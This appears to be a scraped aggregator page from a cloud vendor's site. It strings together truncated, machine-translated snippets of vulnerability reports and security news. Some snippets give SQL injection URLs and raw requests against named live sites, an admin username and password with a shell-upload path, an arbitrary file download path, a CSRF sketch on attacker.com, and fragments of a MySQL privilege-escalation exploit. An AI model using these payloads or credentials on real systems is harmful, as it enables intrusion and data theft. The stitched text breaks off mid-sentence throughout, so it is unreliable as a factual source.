Want to know vulnerability database? we have a huge selection of vulnerability database information on alibabacloud.com
The SQL injection vulnerability exists in online community forums. In severe cases, you can obtain host and database information. You may wish to fix the problem as Administrator speed to avoid host security threats.Detailed description:Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'and '1' = '1Http://club.she.tom.com/users/userinfo.php? Username = qiaofeiyu 'or '1' = '2Http://club.she.to
SQL injection vulnerability on a platform of erie group leaked 587 database data (a large number of APP databases) GiftDetailed description: http://219.238.206.50:8001/ Dealer Business SystemSQL Injection GET /public/login/login1.asp?USERID={1B1123E1-B310-4113-1B5A-213312284BA6} HTTP/1.1Pragma: no-cacheReferer: http://219.238.206.50:8001/enterprise/list.asp?type=3Acunetix-Aspect: enabledAcunetix-Aspect-Pass
Tracking the SQL Server database server login process, found that the password calculation is very fragile, the SQL Server database Password Vulnerability embodies two aspects: 1. Password encryption algorithm for network landing 2. Password encryption algorithm for database storage. Here is a separate story: 1. Passw
YYCMS music program v4.0 VIP edition, just read the database file conn. asp file where the database address is YYCMS_Data/# 67tingdata. asa. At first, I thought this was the default database. Later I checked the database file and found that the database Yes/YYCMS_Data/# us
mysql| Data | Database CNET science and Information Network February 5 International Report according to software evaluation company Coverity Friday (January 4), through the open source database used by many websites--mysql's source code analysis, found that its vulnerabilities than other commercial database code loopholes. According to Coverity's report, Coverit
Release date:Updated on: Affected Systems:Sourceforge sqlitemanager 1.2.4Description:--------------------------------------------------------------------------------Bugtraq id: 57560SQLiteManager is a multilingual Web tool for managing SQLite databases.SQLiteManager 1.2.4 and other versions have the Remote PHP code injection vulnerability. Attackers can exploit this vulnerability to execute arbitrary PHP co
FengCMS CSRF vulnerability can cause database dumping Important functions cannot be detached due to lack of csrf token VerificationDetailed description: The data backup function in the background management does not undergo csrf token verification.The attacker made the following csrf. php and put it under attacker.com: file_put_contents("test.txt", " IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND); file_put_con
Today, I found a vulnerability like this. I searched the internet for a long time and did not find any exploitation methods. So I found the vulnerability and finally found it ..MMHTTPDB. php:If (extension_loaded ("mbstring ")){$ AcceptCharsetHeader = "Accept-Charset:". mb_internal_encoding ();Header ($ acceptCharsetHeader );$ Head = "Echo ($ head );}// Build connection object// If ($ connType = "MYSQL ")If
1. A station weak password + arbitrary upload caused by shell address is located in: http://fota.suning.com weak password: Admin: Administrator arbitrary upload vulnerability is located in the "Modify version" and "upgrade package query" Page uploaded after Shell 2. suning Enterprise Office Platform any file cross-disk download address is located in: http://ewp.suning.com.cn/app/plugins/download.jsp Path can customize any file drive letter. Download T
The SQL injection vulnerability in the main site of hillstone network affects database security. After seeing your recruitment information, I tested it with curiosity ··· POST Data Packet: POST /pub/iNGFWtest/register.php HTTP/1.1Content-Length: 552Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.hillstonenet.com.cn:80/Cookie: lc8_sid=wzNkuS; PHPSESSID=tnt4a
Describe: Php-nuke is a popular web site creation and management tool that can use a lot of database software as a backend, such as MySQL, PostgreSQL, mSQL, InterBase, Sybase, and so on. An input validation vulnerability exists on the Your_account module implementation of Php-nuke that a remote attacker could exploit to execute a SQL injection attack on the server program. Php-nuke's Your_account modu
Tracked down the database zone hrefdev. yesky. the logon process of the comdevsjktarget_blankSQLSERVER database server finds that password computing is very fragile. The password of the SQLSERVER database is vulnerable in two aspects: 1. Password Encryption Algorithm for network login 2. password encryption for database
Release date:Updated on: Affected Systems:Oracle Oracle10g Enterprise Edition 10.2.5Oracle Oracle10g Enterprise Edition 10.2.3Oracle Oracle10g Enterprise Edition 10.2.0.4Oracle Oracle10g Personal Edition 10.2.5Oracle Oracle10g Personal Edition 10.2.3Oracle Oracle10g Personal Edition 10.2.0.4Oracle Oracle10g Standard EditionOracle Oracle11g Standard EditionDescription:--------------------------------------------------------------------------------Bugtraq id: 47430Cve id: CVE-2011-0806 Oracle Ne
Describe: Php-nuke is a popular web site creation and management tool that can use a lot of database software as a backend, such as MySQL, PostgreSQL, mSQL, InterBase, Sybase, and so on. An input validation vulnerability exists on the Your_account module implementation of Php-nuke that a remote attacker could exploit to execute a SQL injection attack on the server program. Php-nuke's Your_account mo
Release date:Updated on: Affected Systems:Oracle Oracle10g Enterprise Edition 10.2.5Oracle Oracle10g Enterprise Edition 10.2.3Oracle Oracle10g Enterprise Edition 10.2.0.4Oracle Oracle10g Personal Edition 10.2.5Oracle Oracle10g Personal Edition 10.2.3Oracle Oracle10g Personal Edition 10.2.0.4Oracle Oracle10g Standard EditionOracle Oracle11g Standard EditionDescription:--------------------------------------------------------------------------------Bugtraq id: 47429,47431Cve id: CVE-2011-0792, CVE-
Brief description: due to a File Inclusion Vulnerability, you can bypass the background permission restriction and enter some pages.Detailed description:$ Controller = ABSPATH./content/. $ params [model]./index. php; // Die ($ controller ); // Load the call Tag If (file_exists (ABSPATH./content/index/common_call_label.php) require_once (ABSPATH./content/index/common_call_label.php ); // Var_dump ($ controller ); If (file_exists ($ controller ))
Oracle local time 18th released a July security update to repair 65 software deficiencies, including a number of serious cross product issues. The repairs include many serious weaknesses. Darius Wiles, Oracle's senior manager responsible for security warnings, said 27 of the 65 errors could be exploited by anonymous remote attackers. Oracle does not recommend any alternative, only to urge customers to repair the system as soon as possible. "We fix flaws in a serious order," Wiles said. Critica
This morning idle boring, just a friend sent over the background of a website management password. He asked me to take a look at him. I said you got backstage. You can use the Backup database feature to get Webshell AH. He said backstage has the option of data backup. But it doesn't work. There are options for backing up. But after the click of the error! The administrator should have renamed the file. or the location has changed. You can't back
Let's make up the words: Kingsoft has done it again. The vulnerability was released on Seclist in December 1. The author tested successfully On Debian Lenny (mysql-5.0.51a) and OpenSuSE 11.4 (5.1.53-log), and added a MySQL Administrator account after successful code execution. Use DBI (); $ | = 1; = for comment MySQL privilege elevation ExploitThis exploit adds a new admin user. by Kingdom Tested on www.2cto.com * Debian Lenny (mysql-5.0.51a) * OpenSu
Dahan JCMS can directly read the database configuration file because the file path is not filtered during file reading, may cause database leakage or getshell because the read xml file does not filter the passed parameters, flowcode parameters are controllable, the configuration file address WEB-INF/config/dbconfig. xml, since the file suffix is controlled, can only read the xml file http://netcenter.cau.ed
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
